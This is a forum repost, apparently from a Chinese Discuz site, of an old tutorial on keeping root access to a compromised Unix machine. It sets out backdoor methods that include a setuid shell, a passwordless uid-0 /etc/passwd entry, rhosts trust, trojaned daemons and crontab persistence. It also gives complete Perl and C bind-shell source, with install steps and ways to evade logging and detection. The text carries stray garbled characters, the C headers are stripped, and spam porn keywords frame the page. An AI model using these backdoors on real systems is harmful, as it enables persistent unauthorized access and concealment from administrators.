中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub>

<listing id="xxpls"><u id="xxpls"></u></listing>

<sub id="xxpls"></sub>

<sub id="xxpls"><ol id="xxpls"></ol></sub>

<style id="xxpls"><u id="xxpls"></u></style>

<button id="hh3op"></button>

汶上信息港

標(biāo)題: 如何創(chuàng)建后門 [打印本頁]

---

作者: 雜七雜八    時(shí)間: 2011-1-13 17:04
標(biāo)題: 如何創(chuàng)建后門
參考文獻(xiàn)：
: ]  T+ m. b3 KArticle: backdoor from The Infinity Concept Issue II
6 s) J, Z5 D9 ]( G. MSrc: b4b0.c by b4b0
Src: daemonsh.pl by van Hauser / [THC] in 1997'
& C& z# \/ D3 ?- ]' W% C5 ^' @
9 V) g& @! ?5 S0 i! k& A) ]1 Q/ U--
5 k5 d6 I/ g! y0 G; h
千辛萬苦（or 輕而易舉）的取得root后，當(dāng)然希望長久的保持. 以被以后用來。。。d0ing what u want t0 d0 :) 傳統(tǒng)的方法就是建立一個(gè)后門(backd00r).即使入侵被發(fā)現(xiàn)，好 的（先進(jìn)）后門仍然能夠使你再次輕松的破門而入 -- 請(qǐng)記?。?" we come back and we are the h.a.c.k.e.r "
6 f2 j. E& X/ M' }5 F4 y--
創(chuàng)建后門的方法如下：
9 I( i- l- q( }- G" S-
- i2 Y/ s1 Q8 u/ T6 k+ t# F1. setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
7 ]8 ^0 T' q, j. b7 X& y加上 suid 位到shell 上，最為簡(jiǎn)單方便，但也最為容易被ADM 發(fā)現(xiàn) find / -perm 4000 -print;同時(shí)在大多數(shù)的SUNOS 上 你會(huì)發(fā)現(xiàn)不能setuid。-- 適用于新手；
-
2. echo "zer9::0:0::/:/bin/csh" >> /etc/passwd 即給系統(tǒng)增加一個(gè) id 為 0（root)的帳號(hào)，無口令； 也很容易被發(fā)現(xiàn)。 -- 適用于新手；
-
3.echo "+ zer9">>/.rhosts
即本地的名為 zer9 的用戶可以直接 rlogin target 無須口令此時(shí)的 zer9 就相當(dāng)于口令，不知道的人是不能進(jìn)去的.
前提是目標(biāo)的port 512or513or514 opening.
注： 如 echo "+ +">>/.rhosts 則任何用戶都可rlogin至目標(biāo) 導(dǎo)致目標(biāo)門戶打開，最好不要；
還可 echo "+ +">>/etc/hosts.equiv 但這樣不能取得root權(quán)限；-- 適用于比新手高一點(diǎn)點(diǎn),比中級(jí)水平低一點(diǎn)點(diǎn)的guys;
-
4.modify sendmail.cf 增加一個(gè)"wiz" 命令;
usage:
telnet target 25 [enter]
wiz[enter]
" D+ l8 {: @2 h- B* [4 V' p3 m這是我從SAFEsuite中學(xué)到的（但沒試過）；比較危險(xiǎn)。因?yàn)閹缀跛械膾呙杵鞫紩?huì)刺探本漏洞。不過你可把命令本身該成其他不易猜到的名字。比較復(fù)雜，危險(xiǎn)，但ADM不易發(fā)現(xiàn)，隱蔽性較強(qiáng)；你只在你的機(jī)器上試一試就okay了；-- 顧名思意，大師級(jí)漏洞；
1 ?# \+ Q# J# p1 v, H8 ^6 N- A0 ^-
5. crack suck as inetd,login,...
. V7 }% [* {- A! q/ g$ I即安裝它們的特絡(luò)繹版本。你需要找到各版本unix的rootkit;然后分別編譯即可；-- 如果目標(biāo)機(jī)上沒有安裝 tripwire之類的東東，那幾乎不可能被發(fā)現(xiàn)。linux&sunos&freebsd的可能好找，但其他的了？即使你找到了，你有對(duì)應(yīng)平臺(tái)上的編譯器嗎？我有一臺(tái)運(yùn)行 slackware,one running irix,one runningsunos,one running hpux,one running digits unix,...
hahhahha,我又做夢(mèng)了:)
-- 我個(gè)人認(rèn)為是最好的方法，但實(shí)現(xiàn)起來有一定風(fēng)險(xiǎn)，你必須考慮到如果你的木馬運(yùn)行出錯(cuò)怎么辦--因?yàn)槲覀兯龅囊磺卸急仨氁圆黄茐哪繕?biāo)機(jī)上的任何數(shù)據(jù)為原則；
4 |! N/ x) X0 e-
6.ping rem0te backd00r
即使是防火墻也很少阻止 ICMP 的通過，因此本后門可繞過防火墻。具體的程序你可在 [THC] 的主頁發(fā)現(xiàn)；我想到了另外一種直接用ping命令實(shí)現(xiàn)的可通過防火墻的方法 ：一方在防火墻內(nèi)，一方在防火墻外；除 ICMP 外；通向防火墻內(nèi)的信息均被過濾掉 ：(用 60k data 代表長,10k data 代表短；使用摩爾思編碼；（或其他自定義編碼）雙方通過 ICMPinfo 接受信息（ping 's data length)；“嘀，嘀,嘀嘀,嘀,嘀嘀嘀...""長江長江，我是黃河--- 向我開炮！向我開炮”(^o^);以后有時(shí)間我會(huì)通過程序來實(shí)現(xiàn)驗(yàn)證可行性的。(技術(shù)上應(yīng)該沒有什么難度）
-
7.rem0te shell
我最喜歡的方式。而且由于繞開了login,故用 who 無法看到--也就是說，避開了utmp&utmpx&wtmp&wtmpx;但沒有完全避開 syslogd.ADM仍可以在/var/log/messages中發(fā)現(xiàn)
你。不過，有一種方法可以徹底完全的旁路 syslogd!且聽下面一一道來.
8 d+ K. I/ x6 \) Q7 ^bindshell的實(shí)現(xiàn)有兩種：
0 n3 D+ c) G# X5 D$ n* va.
替換掉 inetd.conf 中的不重要服務(wù)，如 rlogind :)在inetd 接受 connect 請(qǐng)求后,直接在本端口利用 system("/bin/csh -i");直接spam 出一個(gè)shell，
b. 接受 connect 后，在高端spam出一個(gè)shell;
（更安全 ：）
下面我給出一個(gè)perl 實(shí)現(xiàn)（不需socket libary支持）(pass on sunos5.5.1&slackware 2.0.33&irix6.4&hpux10.2)和一個(gè) gnuc 的實(shí)現(xiàn)（test on slackware 2.0.33&irix6.4)
- W+ j4 S" c, ]- r---
perl 版安裝方法：
/ |) Y5 W3 G% I& k1 b( Z' s  y###無須編譯?。≈灰繕?biāo)機(jī)上有perl支持就okay!
如何判斷有無perl: $/>perl [enter]

) Y0 Q9 c# Z8 a9 [5 u( D[ctrl-c]
$/>
/ m- r8 K+ G0 G. p& {9 p$ Z-
如果你對(duì) /etc/inetd.conf 中的內(nèi)容不是很熟的話,下面
) X8 @* B# Z2 Y# f0 f7 U的方法有很大的危險(xiǎn)性, exit(-1) please;
! I+ R( W7 t) n) R0 o* V-
首先將源程序cut，存為你想要替換的daemon,如in.rexecd or or in.rlogind ,in.pop2d....最好是已經(jīng)被ADM關(guān)掉了，而且不太引人注目的daemon,注意，一定要是 TCP types.然后
# t$ u7 a. o" x7 X, O! B  @: s. Z; hmv /usr/sbin/in.rexecd /usr/sbin/in.rexecd.bak :))
0 f" C& x. f6 o- [) vcp in.rexecd /usr/sbin/in.rexecd
' s% e; T) Y6 ~0 i2 S' F( H然后 ps -aux|grep inetd;kill -HUP id(by inetd);
/ {" t1 \( L4 T2 a2 d) g, tokay! 連 /etc/inetd.conf 都不要改。重申一點(diǎn)：不論在任何情況下，我們都要盡最大的可能保護(hù)數(shù)據(jù)！
  ]' r1 l8 J4 q* B  _$ X! {( M-
( I, E& m  E% ]3 oUsage: nc target (such as 512)
[enter]
% s, ]+ o! X. C  v$ l$ [ur passwd [enter]
2 T4 a$ M6 x: F) F: \% e(then u login in...:)
7 U2 r7 O% _2 ]2 P, N' L
) l" u! _- C2 C----Cut Here------------------------------------------
4 x$ u% ]! N. ?# w. }
+ s* N, c8 X5 s# @#!/usr/bin/perl
#
5 j5 @% Y& v2 K4 t  i, D$ b+ I" J# BEST
* y$ ~" @# @9 y+ ~1 s7 N3 V# SIMPLE
, x2 k1 V3 F9 P2 `! q( I1 I" O# rem0te bind shell
4 L4 T- Y+ \, [- f1 C+ H) b# J& Y#[perl version only tcp]
& x# W# z( D  A; U4 V. r# by
3 T/ H6 i4 |9 d4 }; B( g8 o# zer9[FTT]
7 F; A( \. o; ^/ a, s. s9 n* \# zer9@21cn.com
; }5 G1 a' V  L+ l#passed on allmost unix
* L. B3 }8 U7 y/ J9 d#greet to:van Hauser/[THC]
; F- ?! _: M$ l4 j" M# for his daemonshell.pl
" h+ H: X& e6 T" c* [: C0 M2 X#
$SHELL="/bin/csh -i";
* z: k* P9 c9 H4 j  P#d3f4ult p4sswd 1s "wh04r3u" (no quote);
$PASSWORD="BifqmATb6D5so";
) J, e5 ?1 p0 s
, T2 q# f+ @% ~! e( r" ^if ($PASSWORD) {
5 M0 m( b) k) a- `* P  Xchop($pass=);
if (crypt($pass, $PASSWORD) ne $PASSWORD) {
exit 0;
}
exec $SHELL ;
7 k( c! y. P. R5 Cexit 0;
}
+ e* `; v9 U% t% v5 l
, ~1 m0 S* d+ P) W' g' o5 F----Cut Here--------------------------------------------



6 [( X! V$ Z9 s4 r
下面是一個(gè)for gnuc 的bindshell,first cut it,save as
backdoor.c ,then cc backdoor.c -o backdoor
) Q. P6 N, X, a7 {other action just l1ke before;
Usage: (exp:binding to in.rlogind (513))
nc target 513 //spam a shell on the high port;
$ d5 Z& `. Z, cnc target 54321
/ i! \+ {  L% y6 f9 y+ Yur passwd
3 h: J/ O! |  c8 B5 M# S0 M" s(then u coming in...)
" M( C: w: B2 a
! k  d1 p$ m# P9 I
----Cut Here-------------------------------------
0 m+ L, p; H" M: q7 j
/*
* [ b i n d - s h e l l ]
* by
, ^" M$ m9 v5 P$ v% ~) ]9 u* zer9[FTT]
7 M& e" V) V8 ?: S6 j4 T: Z* zer9@21cn.com
*test on slackware 2.0.33&irix6.4(cc)
*cc backdoor.c -o backdoor
*u c4n p01nt t0 wh1ch p0rt th3 sh3ll t0 sp4m
& t! R- q7 z, ]7 x- ^# y5 e0 [*c0mm4nd l1n3: backdoor [port]
*d3fault p0rt 1s: 54321
*greets to b4b0 for his b4b0.c
4 w4 w% P% L! P% p: k*m4yb3 1 c0uld s4y:
*"0k,b4b0.l1st3n c4r3fully;"
*s0rry,just a joke.
5 P4 x4 z+ n& J5 @& Q3 _*
. D6 U7 g2 `" V3 f% p. D3 ^*/

, H( `5 w. Q) S) A% ^8 Q; b" c#include
#include
#include
" S) i# _: v. N, |% u% K1 g#include
+ w4 N8 K1 h: O; S- s" U" T7 `! j#include
#include
/ Z9 E( v5 b1 \; \) W  N6 Q+ x7 ]  ]# U#include


#define PassWord "k1n90fth3w0rld"
6 F6 }7 O0 l4 F, \7 F. E3 Y( f# }$ o/* u c4n us3 crypt l1b4ry t0 sh4d0w 1t */
( p7 Z# L' {/ W9 P0 H! z
#define DefaultPort 54321
' f( `8 {! N2 T2 t/* d3f4ult b1nd1ng p0rt */
4 g- l  e; {* i/ P/ D2 [7 v/ }
int main(int argc,char **argv)
{
+ K; b' r1 Y1 Z9 s5 D- Nint s,in_s;
struct sockaddr_in server,client;
int client_len,bindport;
# N( ?% Z( y9 zchar recvbuf[1000];

2 V0 V, H0 t+ P* d+ e  ~  Q1 Lif(argc!=2) bindport=DefaultPort;
/ c3 \! j: i/ e/ i: y/ {. Delse
bindport=atoi(argv[1]);
if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
" ?0 K" Z% x+ w- v' }3 Sperror("socket");
return -1;
}
, t: t  A* g+ C% p, O7 z0 Nbzero((char *)&server,sizeof(server));
bzero((char *)&client,sizeof(client));
bzero(recvbuf,sizeof(recvbuf));
) X1 P. J" W" X/ cserver.sin_family=AF_INET;
server.sin_port=htons(bindport);
' ^4 |( m4 ]1 p# e' S, f& K  bserver.sin_addr.s_addr=INADDR_ANY;
if(bind(s,(struct sockaddr *)&server,sizeof(server))<0)
1 \5 {  a9 W8 F2 s$ C1 ^{
& u) O6 Y- L( \/ C- b1 hperror("bind");
return -1;
2 _5 d' A( N/ M/ M: E2 g9 f}
' f, P9 ^) `2 X# j' [/ kif(listen(s,3)!=0)
& H2 W: O( x$ f$ s* x{
perror("listen");
- \7 X* F( q' \( I; {* q+ dreturn -1;
& h; O3 s" X) V- b$ s7 w}
" ?9 s) z' T/ X8 eclient_len=sizeof(client);
0 D: l4 ]/ Y- [4 k0 Kif((in_s=accept(s,(struct sockaddr *)&client,&client_len))<0)
{
perror("accept");
, t% t" f; [' Preturn -1;
}
recv(in_s,recvbuf,sizeof(recvbuf),0);
) s- x& ^' e! Vsleep(1);
if((strlen(recvbuf)-1)==strlen(PassWord))
if(!strncmp(recvbuf,PassWord,strlen(PassWord)))
) ]- _( M" p% |+ c) }{
$ H3 P  t3 I* F1 X2 b) U9 E" M% Gsend(in_s,"0k4y! c0m1ng 1n...\n",25,0);
close(0);close(1);close(2);
dup2(in_s,0);dup2(in_s,1);dup2(in_s,2);
0 Z4 z+ r9 n& F7 O8 _execl("/bin/csh","/bin/csh",(char *)0);
- w8 m0 f- c- o0 ^0 ]}
close(s);
# j$ ?: |( b& m$ D& L$ R; J+ dclose(in_s);
9 y1 [" p9 F0 z# s5 E0 Z* Vreturn 0;
}

----Cut Here-------------------------------------------------

用上面的方法都不能完全的避開syslogd,因?yàn)樗麄兌际怯蒳netd 啟動(dòng)的，inetd啟動(dòng)它們的同時(shí)已經(jīng)進(jìn)行l(wèi)og 了;旁路掉inetd就能完全避開syslog!方法很簡(jiǎn)單，只要直接在命令行直接啟動(dòng)例程2(c)就可以了，（1perl不行）;不過這樣很麻煩；一旦ADM關(guān)掉計(jì)算機(jī)就玩完了；比較好的方法是在 /etc/rc.d/rc.local中加入：
backdoor &
但即使這樣作了，每次用過后還要再起動(dòng)一次；更好的方法是寫一個(gè)具有完全功能(后門功能^o^）的daemon,徹底的解決這個(gè)問題；但這樣做與hack inetd 那樣更有效率（安全）了？
--
8 m* I* i3 X8 K% f- i8.第八種武器就是 crontab
- d/ `% _: ~1 Z0 Z& n3 c我只知道原理，沒實(shí)踐過.每到一定時(shí)間就往 /etc/passwd 中加入一條uid為0（root）
, b' U* k) }+ a9 E5 p/ V( o: I" d的用戶；時(shí)間一道就delete ,或創(chuàng)建suid's shell...在序言中提到的文章中有詳細(xì)介紹；
--
9.有沒有想過只要向系統(tǒng)的一個(gè)用戶發(fā)一個(gè)email,OS 就會(huì)spam出一個(gè)shell?利用用戶的home目錄下的 .forward 可作到這一點(diǎn)。
: P+ ^. t5 J2 `' }7 u- d8 ^--
10。修改內(nèi)核--超級(jí)高手的做法；2.2.0的解壓文件達(dá)到了50幾MB,看到就頭痛。接著就 jmp ffff0 :) (不是看到內(nèi)容，而是看到大?。?[THC]最近出了篇文章關(guān)于這個(gè)的。你對(duì)自己有信心的話可以看看；
% N) q: }7 Q9 G5 p( J--
! T/ }& S/ ?# p0 [11.還有就是利用 overflow 程序，雖然我們一般是利用它取得root;但只要 ADM && u 沒有 patch ,始終我們可以利用它的，與suid不同的是它不怕被 find / -perm 4000 發(fā)現(xiàn)；一般只有 tripwire可發(fā)現(xiàn)。
; J9 N% T1 c- D+ Q! @" j

---

歡迎光臨 汶上信息港 (http://huihexinxi.com.cn/)

Powered by Discuz! X3.5

中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub>

<listing id="xxpls"><u id="xxpls"></u></listing>

<sub id="xxpls"></sub>

<sub id="xxpls"><ol id="xxpls"></ol></sub>

<style id="xxpls"><u id="xxpls"></u></style>